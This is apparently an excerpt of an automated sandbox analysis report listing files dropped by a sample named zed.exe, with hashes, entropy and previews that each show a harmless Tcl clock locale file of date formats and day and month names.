                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoXqyFjoIX3vLjoIX3v6mjog+3vnFDoAkvn:4EnLB383AqWv3vL3v6d3v9dmn
                                                                                                                                                                                                                                            MD5:07EEADB8C2F2425FF9A27E46A81827A2
                                                                                                                                                                                                                                            SHA1:AA18A651C64098C7885F1F869B9F221453F42987
                                                                                                                                                                                                                                            SHA-256:AAD828BCBB512FBD9902DCDD3812247A74913CC574DEB07DA95A7BBE74B1FE48
                                                                                                                                                                                                                                            SHA-512:1FA60B1A69B2F5FD2C009EC18695A937C4484D7C418F7E8398D95723B857698143E0584A546F9032B75894730CBBEF78453061AC13D90199FF702E148D983C28
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr_BE DATE_FORMAT "%d/%m/%y".. ::msgcat::mcset fr_BE TIME_FORMAT "%T".. ::msgcat::mcset fr_BE TIME_FORMAT_12 "%T".. ::msgcat::mcset fr_BE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.890376345610709
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xooIso13vLjo13v6mjo1+3vnFDoAkvn:4EnLB383vIF3vU3v6A3v9dmn
                                                                                                                                                                                                                                            MD5:2F70BDDE7685E2892C5F79C632FC2F0F
                                                                                                                                                                                                                                            SHA1:FD1A6F6042E59D1563ABB5858C348C1D785C435E
                                                                                                                                                                                                                                            SHA-256:0624DF9A56723DDB89E59736C20A5837DEA2206A789EBE7EEF19AD287590CA45
                                                                                                                                                                                                                                            SHA-512:50FC0C91AB2C75FFC4F100C0D42DFC4B2101DB9713FD77E6FF5BF3F25A0AF4A535A4709CF4586809CEEE76C25B66ABC0DD4FD61524510C57AA0E63EA8F46E8D5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr_CA DATE_FORMAT "%Y-%m-%d".. ::msgcat::mcset fr_CA TIME_FORMAT "%T".. ::msgcat::mcset fr_CA TIME_FORMAT_12 "%T".. ::msgcat::mcset fr_CA DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):288
                                                                                                                                                                                                                                            Entropy (8bit):4.913241133684606
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoFt28oF+3vLjoF+3v6mjo++3vnFDoAkvn:4EnLB383yte+3vs+3v6/3v9dmn
                                                                                                                                                                                                                                            MD5:83FC7EBA68C3727F7C13C8EEAF79823F
                                                                                                                                                                                                                                            SHA1:81C27F9B97F5F5190F7189230535EC09CD228158
                                                                                                                                                                                                                                            SHA-256:290CA6EB74BAEAC4E2420D0755D148849F89EE87E37860F25CBB7B8AFA3EDCBC
                                                                                                                                                                                                                                            SHA-512:35DA46558A246D7B3FAB02208001CE986E2E6DD88D6318AF743F4E81CA6920471D1425BB009A7476A79E7F61E1353C027B765331CD8EFA07A9E884DCB73F2195
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr_CH DATE_FORMAT "%d. %m. %y".. ::msgcat::mcset fr_CH TIME_FORMAT "%T".. ::msgcat::mcset fr_CH TIME_FORMAT_12 "%T".. ::msgcat::mcset fr_CH DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1188
                                                                                                                                                                                                                                            Entropy (8bit):4.314271783103334
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR835k0CM/hlrXa754pD73/tKSx54pbIK5f2CA:43W05rXUa173/VadDA
                                                                                                                                                                                                                                            MD5:67D137E5D853DB61A4B4264871E793F7
                                                                                                                                                                                                                                            SHA1:4280E7F662DE792175AF8B4C93874F035F716F0F
                                                                                                                                                                                                                                            SHA-256:880806867ACABD9B39E3029A5ADD26B690CC5709082D43B0959EBA725EA07AB5
                                                                                                                                                                                                                                            SHA-512:C27B745143539D3E6D94BB754DCA35065CDE9B1AA6EE038D47F658175CFACC20236124D38BE5BBB03CAF8F613BD748C43CB8DFCC9234E915D18B5A477BAEF94E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ga DAYS_OF_WEEK_ABBREV [list \.. "Domh"\.. "Luan"\.. "M\u00e1irt"\.. "C\u00e9ad"\.. "D\u00e9ar"\.. "Aoine"\.. "Sath"].. ::msgcat::mcset ga DAYS_OF_WEEK_FULL [list \.. "D\u00e9 Domhnaigh"\.. "D\u00e9 Luain"\.. "D\u00e9 M\u00e1irt"\.. "D\u00e9 C\u00e9adaoin"\.. "D\u00e9ardaoin"\.. "D\u00e9 hAoine"\.. "D\u00e9 Sathairn"].. ::msgcat::mcset ga MONTHS_ABBREV [list \.. "Ean"\.. "Feabh"\.. "M\u00e1rta"\.. "Aib"\.. "Beal"\.. "Meith"\.. "I\u00fail"\.. "L\u00fan"\.. "MF\u00f3mh"\.. "DF\u00f3mh"\.. "Samh"\.. "Noll"\.. ""].. ::msgcat::mcset ga MONTHS_FULL [list \.. "Ean\u00e1ir"\.. "Feabhra"\.. "M\u00e1rta"\.. "Aibre\u00e1n"\.. "M\u00ed na Bealtaine"\.. "Meith"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.824539027053997
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xobHAygDobHAqo+3vLjobHAqo+3v6mjobHAy9+3vnFDoAkv:4EnLB383p23vy3v6a3v9dmn
                                                                                                                                                                                                                                            MD5:C27BD7F317AAADB380F4C38AE0D2FDA6
                                                                                                                                                                                                                                            SHA1:79870A0E68AA0A9B301414EDC21889F83BB81E40
                                                                                                                                                                                                                                            SHA-256:3F9615C617D3CDBC1E127B3EFEE785B0CB5E92E17B7DABAC80DA2BEAF076362C
                                                                                                                                                                                                                                            SHA-512:3605B9A914284CF1D3CC90DF2F21A86C0472AEE59800942DC93D842C7AE164E1DA72813787F163DC80B72269D2C391953ABAD6A8B72CCF069BEE96D418A173E9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ga_IE DATE_FORMAT "%d.%m.%y".. ::msgcat::mcset ga_IE TIME_FORMAT "%T".. ::msgcat::mcset ga_IE TIME_FORMAT_12 "%T".. ::msgcat::mcset ga_IE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):997
                                                                                                                                                                                                                                            Entropy (8bit):4.120890519790248
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83okzalCcPdJ5rK8yzMY4JlV1ZDqqIkFo8w:43JkPj9K8y4HHZLIQtw
                                                                                                                                                                                                                                            MD5:A3D098C1A47E380F7C25233A52FBDE38
                                                                                                                                                                                                                                            SHA1:C97E4EAA9E7A7F99950F422B93C57134B532C639
                                                                                                                                                                                                                                            SHA-256:34D61B49DBF9584893051FFB458D6DE9E7E2E7774AC0011F70C4DD4184EBA81C
                                                                                                                                                                                                                                            SHA-512:4687AB3D2FAA65FED90678EBC08C074959E93A9FEFAF3D61EEE39DB08FD200CB57C0DDB4DDBF6451FE1EF5E07EA976EDEF830769FF403CE51734129CEF24DA9F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gl DAYS_OF_WEEK_ABBREV [list \.. "Dom"\.. "Lun"\.. "Mar"\.. "M\u00e9r"\.. "Xov"\.. "Ven"\.. "S\u00e1b"].. ::msgcat::mcset gl DAYS_OF_WEEK_FULL [list \.. "Domingo"\.. "Luns"\.. "Martes"\.. "M\u00e9rcores"\.. "Xoves"\.. "Venres"\.. "S\u00e1bado"].. ::msgcat::mcset gl MONTHS_ABBREV [list \.. "Xan"\.. "Feb"\.. "Mar"\.. "Abr"\.. "Mai"\.. "Xu\u00f1"\.. "Xul"\.. "Ago"\.. "Set"\.. "Out"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset gl MONTHS_FULL [list \.. "Xaneiro"\.. "Febreiro"\.. "Marzo"\.. "Abril"\.. "Maio"\.. "Xu\u00f1o"\.. "Xullo"\.. "Agosto"\.. "Setembro"\.. "Outubro"\.. "Novembro"\.. "Decembro"\.. ""]..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.886176304042503
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoPhkgMoPxsF3v6ay/5oPhk9+3vR6HyFvn:4EnLB383WrfK3v6ay/WJ3voSVn
                                                                                                                                                                                                                                            MD5:78B9163C5E8E5E7049CBF91D1A5889A4
                                                                                                                                                                                                                                            SHA1:F2F07AF3D79D61C8E0C73B13E2CA8266E10E396B
                                                                                                                                                                                                                                            SHA-256:B5688CA07D713227B713655877710258CD503617E8DF79293A971649E3134F05
                                                                                                                                                                                                                                            SHA-512:E86074B687670542CFA097C94D150292E1A73C9F231E92CD84386580A446569CC6F8F5817F46ED64A1D00F95D59F6F1F5D4B961DF3C8335938D83F3517794353
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gl_ES DATE_FORMAT "%d %B %Y".. ::msgcat::mcset gl_ES TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset gl_ES DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1084
                                                                                                                                                                                                                                            Entropy (8bit):4.213672208102291
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR832vTXAC2/fS5JfaCroeLaCAQbSm5qJe1:43QTXs32zrf
                                                                                                                                                                                                                                            MD5:518FC3964D50854081FB79189A42D3E7
                                                                                                                                                                                                                                            SHA1:59392F16CD56E3E6A685F78974D539FB3A972B98
                                                                                                                                                                                                                                            SHA-256:404795F2C88D0038F9ED0B5120A251D26EDF8B236E1B1698BC71ACD4DC75AC45
                                                                                                                                                                                                                                            SHA-512:E5C88CAB8741D631938CEC2E0959C0FE26685C395F5F9F4F1B5C9E146E84D23D897CD7A823AB46D4B62C590AE15EC76B87EB59308ACFB1BB6F61398890B43622
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gv DAYS_OF_WEEK_ABBREV [list \.. "Jed"\.. "Jel"\.. "Jem"\.. "Jerc"\.. "Jerd"\.. "Jeh"\.. "Jes"].. ::msgcat::mcset gv DAYS_OF_WEEK_FULL [list \.. "Jedoonee"\.. "Jelhein"\.. "Jemayrt"\.. "Jercean"\.. "Jerdein"\.. "Jeheiney"\.. "Jesarn"].. ::msgcat::mcset gv MONTHS_ABBREV [list \.. "J-guer"\.. "T-arree"\.. "Mayrnt"\.. "Avrril"\.. "Boaldyn"\.. "M-souree"\.. "J-souree"\.. "Luanistyn"\.. "M-fouyir"\.. "J-fouyir"\.. "M.Houney"\.. "M.Nollick"\.. ""].. ::msgcat::mcset gv MONTHS_FULL [list \.. "Jerrey-geuree"\.. "Toshiaght-arree"\.. "Mayrnt"\.. "Averil"\.. "Boaldyn"\.. "Mean-souree"\.. "Jerrey-souree"\.. "Luanistyn"\.. "Mean-fouyir"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.936566750568767
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoQbtvMoQLE3v6ay/5oQbto+3vR6HyFvn:4EnLB383PbtvALE3v6ay/PbtF3voSVn
                                                                                                                                                                                                                                            MD5:0B6BE614EF5F5F25A30D2D33701A9F94
                                                                                                                                                                                                                                            SHA1:65800FBD73D9DAE550E04E1D818A6B9D1AEF86FE
                                                                                                                                                                                                                                            SHA-256:86CABF3B9360C0E686CC4CBEB843E971C28BC6D35210ED378B54EB58CC41F3D5
                                                                                                                                                                                                                                            SHA-512:376D21B38DA49A8F7C2983F2B808FD55AC9F6383BC66DF28DB99DBF61FDC9FFF8CD20F077EC3ED873EF47F0F613BDD9AD02DFFB1CB51F9A36715C7FC798C3B70
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gv_GB DATE_FORMAT "%d %B %Y".. ::msgcat::mcset gv_GB TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset gv_GB DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1990
                                                                                                                                                                                                                                            Entropy (8bit):4.298934047406144
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83Y71LCLxL0eCLbCLKCLaCLXL7CLB0p1dLGCoCLU5LT5Gv5LJ9p5LnLEHLGCh:43sl7KqpU/nNbhbOezd2ICn
                                                                                                                                                                                                                                            MD5:A0E60036EB17208A449AAFC3AAAE622C
                                                                                                                                                                                                                                            SHA1:9D7479BA85FBB00A2DF2B61F4ED2CBEA8F1EC8C3
                                                                                                                                                                                                                                            SHA-256:787DA79AF58872BF45AB09E3B6A920A4496B5BD8A4F3C7F010CF013EC2E8EFE0
                                                                                                                                                                                                                                            SHA-512:46D12C14B5736E5EA97EB728BF58999E9D7C2CF910D8F5AFA3F5D3A86329ABF41A3E2BEBD81EE4EF64BEA0DC173B77A9FE12471C1BD9D768ED552A55B3B80213
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset he DAYS_OF_WEEK_ABBREV [list \.. "\u05d0"\.. "\u05d1"\.. "\u05d2"\.. "\u05d3"\.. "\u05d4"\.. "\u05d5"\.. "\u05e9"].. ::msgcat::mcset he DAYS_OF_WEEK_FULL [list \.. "\u05d9\u05d5\u05dd \u05e8\u05d0\u05e9\u05d5\u05df"\.. "\u05d9\u05d5\u05dd \u05e9\u05e0\u05d9"\.. "\u05d9\u05d5\u05dd \u05e9\u05dc\u05d9\u05e9\u05d9"\.. "\u05d9\u05d5\u05dd \u05e8\u05d1\u05d9\u05e2\u05d9"\.. "\u05d9\u05d5\u05dd \u05d7\u05de\u05d9\u05e9\u05d9"\.. "\u05d9\u05d5\u05dd \u05e9\u05d9\u05e9\u05d9"\.. "\u05e9\u05d1\u05ea"].. ::msgcat::mcset he MONTHS_ABBREV [list \.. "\u05d9\u05e0\u05d5"\.. "\u05e4\u05d1\u05e8"\.. "\u05de\u05e8\u05e5"\.. "\u05d0\u05e4\u05e8"\.. "\u05de\u05d0\u05d9"\.. "\u05d9\u05d5\u05e0"\.. "\u05d9\u05d5\u05dc"\.. "\u05d0\u05d5\u05d2"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1777
                                                                                                                                                                                                                                            Entropy (8bit):4.2117128941697715
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:438n4kALqrU1fbokQTbWqrU1fbokQTw38:28OD86D8gM
                                                                                                                                                                                                                                            MD5:4219A929E27308ADC04A9F368F063F38
                                                                                                                                                                                                                                            SHA1:FA728EEBA8751F4CE032ED32AECFDE124D1B68E2
                                                                                                                                                                                                                                            SHA-256:192F4A8E77E1627712F85533C9896EF6A040157C7BD56DF3A4A7FA56AD6746C2
                                                                                                                                                                                                                                            SHA-512:223B137AC1FC15908F5541067736EF3A29493549B963393EB78660036A82982E57CFC4AD09CBD33D32A5187FF9F4ACFB5F83A0C974702434B7FAD1B2539B7F76
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset hi DAYS_OF_WEEK_FULL [list \.. "\u0930\u0935\u093f\u0935\u093e\u0930"\.. "\u0938\u094b\u092e\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0932\u0935\u093e\u0930"\.. "\u092c\u0941\u0927\u0935\u093e\u0930"\.. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\.. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\.. "\u0936\u0928\u093f\u0935\u093e\u0930"].. ::msgcat::mcset hi MONTHS_ABBREV [list \.. "\u091c\u0928\u0935\u0930\u0940"\.. "\u092b\u093c\u0930\u0935\u0930\u0940"\.. "\u092e\u093e\u0930\u094d\u091a"\.. "\u0905\u092a\u094d\u0930\u0947\u0932"\.. "\u092e\u0908"\.. "\u091c\u0942\u0928"\.. "\u091c\u0941\u0932\u093e\u0908"\.. "\u0905\u0917\u0938\u094d\u0924"\.. "\u0938\u093f\u0924\u092e\u094d\u092c\u0930"\.. "\u0905\u0915\u094d\u091f\u0942\u092c\u0930"\.. "\u0928\u0935\u
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.9286948144352865
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xocv+IZoz3v6ry/5oco+3v+6f6HyFvn:4EnLB383Jvlg3v6ry/JF3vmSVn
                                                                                                                                                                                                                                            MD5:1C1E1484EA0286175FADCB90937C9F34
                                                                                                                                                                                                                                            SHA1:5CA1BF19021D529CB3B3A308EFFFCA7E4D073640
                                                                                                                                                                                                                                            SHA-256:5A3BF0DD61BFB5A2BF75E96B11E0E3528FFAB720A0BF1923853606F8CAF0E76D
                                                                                                                                                                                                                                            SHA-512:F9A43E1E18ADB6DC6B18BEDC3303A99F514DF6CA54F12100989F734233012D7D60216116915351CCACC12F6942795BF8F3BBD26B15A86E88101067D64BEE54F5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset hi_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset hi_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset hi_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1171
                                                                                                                                                                                                                                            Entropy (8bit):4.36311224714184
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83dVX79VIE9bLTWnh7rT+5dPcdvgrNv5KvOA1:43kmrQ7n+odIrJ6OS
                                                                                                                                                                                                                                            MD5:906963A3AD09EAC781B35C190B77484E
                                                                                                                                                                                                                                            SHA1:E5AA49DA9C4987EAFA839115F84612426EB8615E
                                                                                                                                                                                                                                            SHA-256:105A9180BC5D23738183374FA0EA8DD80484BF3947E1432E515BDC2913C017D9
                                                                                                                                                                                                                                            SHA-512:557BD1C8306750D09215D9774069A52C7D60E03DE2DF39FF909A8F658AB0565739D127E24ACDC96F736C69A71BEFA30B8A30BB489C7B7FDEA85386C802166349
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset hr DAYS_OF_WEEK_ABBREV [list \.. "ned"\.. "pon"\.. "uto"\.. "sri"\.. "\u010det"\.. "pet"\.. "sub"].. ::msgcat::mcset hr DAYS_OF_WEEK_FULL [list \.. "nedjelja"\.. "ponedjeljak"\.. "utorak"\.. "srijeda"\.. "\u010detvrtak"\.. "petak"\.. "subota"].. ::msgcat::mcset hr MONTHS_ABBREV [list \.. "sij"\.. "vel"\.. "o\u017eu"\.. "tra"\.. "svi"\.. "lip"\.. "srp"\.. "kol"\.. "ruj"\.. "lis"\.. "stu"\.. "pro"\.. ""].. ::msgcat::mcset hr MONTHS_FULL [list \.. "sije\u010danj"\.. "velja\u010da"\.. "o\u017eujak"\.. "travanj"\.. "svibanj"\.. "lipanj"\.. "srpanj"\.. "kolovoz"\.. "rujan"\.. "listopad"\.. "studeni"\.. "prosinac"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1381
                                                                                                                                                                                                                                            Entropy (8bit):4.511450677731002
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83IFb7ZTmKrkAYm2LZyyApLDV2uZi5WF+shHUTyvtsv+:43C3ZTmKQAyZyyAp0BotK+
                                                                                                                                                                                                                                            MD5:E398158EE1CD49CB5286D9642D4A61DD
                                                                                                                                                                                                                                            SHA1:A93A588B0ADD198C067C4BB070DC1E5170E6E208
                                                                                                                                                                                                                                            SHA-256:993475532F89E1EA7214ADB265294040862305612D680CFF01DD20615B731CCC
                                                                                                                                                                                                                                            SHA-512:9E5791FB97110FE5F7A1F49FF2ED8801A05E49D5B9AF579474C0081073D2B40ECFFE6E4EB5B61F12B1995FDCC0A557CB572E5E116F951FD286A6254253DAEC01
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset hu DAYS_OF_WEEK_ABBREV [list \.. "V"\.. "H"\.. "K"\.. "Sze"\.. "Cs"\.. "P"\.. "Szo"].. ::msgcat::mcset hu DAYS_OF_WEEK_FULL [list \.. "vas\u00e1rnap"\.. "h\u00e9tf\u0151"\.. "kedd"\.. "szerda"\.. "cs\u00fct\u00f6rt\u00f6k"\.. "p\u00e9ntek"\.. "szombat"].. ::msgcat::mcset hu MONTHS_ABBREV [list \.. "jan."\.. "febr."\.. "m\u00e1rc."\.. "\u00e1pr."\.. "m\u00e1j."\.. "j\u00fan."\.. "j\u00fal."\.. "aug."\.. "szept."\.. "okt."\.. "nov."\.. "dec."\.. ""].. ::msgcat::mcset hu MONTHS_FULL [list \.. "janu\u00e1r"\.. "febru\u00e1r"\.. "m\u00e1rcius"\.. "\u00e1prilis"\.. "m\u00e1jus"\.. "j\u00fanius"\.. "j\u00falius"\.. "augusztus"\.. "szeptembe
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):961
                                                                                                                                                                                                                                            Entropy (8bit):4.02166638427728
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83dcTcWKutdXaMmEfc2ftdT2dHblWZ0VT:43dQrKutdntdI8g
                                                                                                                                                                                                                                            MD5:191ACF2E8A8F10A1360B283D42886382
                                                                                                                                                                                                                                            SHA1:EE2C00D021381EA638B6CE3F395DEA5F8491ED9B
                                                                                                                                                                                                                                            SHA-256:41C0C3D3B4491E9B36E719466503EFCD325175CB7824C4A5055CB113D347BE0F
                                                                                                                                                                                                                                            SHA-512:29BC4F7D3FAE7DE392B175FEA76138FA823B7D9D0B051A19A73F7D36D51DE34E0D0C7C129867307ABF51FC92E70853C15BD96B8484AD21EAB0A8EB83B0411E03
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset id DAYS_OF_WEEK_ABBREV [list \.. "Min"\.. "Sen"\.. "Sel"\.. "Rab"\.. "Kam"\.. "Jum"\.. "Sab"].. ::msgcat::mcset id DAYS_OF_WEEK_FULL [list \.. "Minggu"\.. "Senin"\.. "Selasa"\.. "Rabu"\.. "Kamis"\.. "Jumat"\.. "Sabtu"].. ::msgcat::mcset id MONTHS_ABBREV [list \.. "Jan"\.. "Peb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Agu"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset id MONTHS_FULL [list \.. "Januari"\.. "Pebruari"\.. "Maret"\.. "April"\.. "Mei"\.. "Juni"\.. "Juli"\.. "Agustus"\.. "September"\.. "Oktober"\.. "November"\.. "Desember"\.. ""]..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.904408530699153
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo0kGMo0F/W3v6ay/5o0kT+3vR6HyFvn:4EnLB383wG33v6ay/wK3voSVn
                                                                                                                                                                                                                                            MD5:FEB4D50576BF3E11A0A40FD29ABE35A7
                                                                                                                                                                                                                                            SHA1:8CEAA187C8AA5EC101743060A877D039850964CA
                                                                                                                                                                                                                                            SHA-256:BA7FC0C0452D3E482DB6E19BDF512CACED639BA72B92ED8F66D80B52FEA11AC0
                                                                                                                                                                                                                                            SHA-512:8B5D18E3D6628F369FB387C8EF08CC80000E0CBE500972958F4AD75F1C2F0DD6058F9777BD7DD0D7C26E7ECAA65E5071E2BF51B560973E88637942116C7576FB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset id_ID DATE_FORMAT "%d %B %Y".. ::msgcat::mcset id_ID TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset id_ID DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1305
                                                                                                                                                                                                                                            Entropy (8bit):4.457417703528286
                                                                                                                                                                                                                                            Encrypted:false
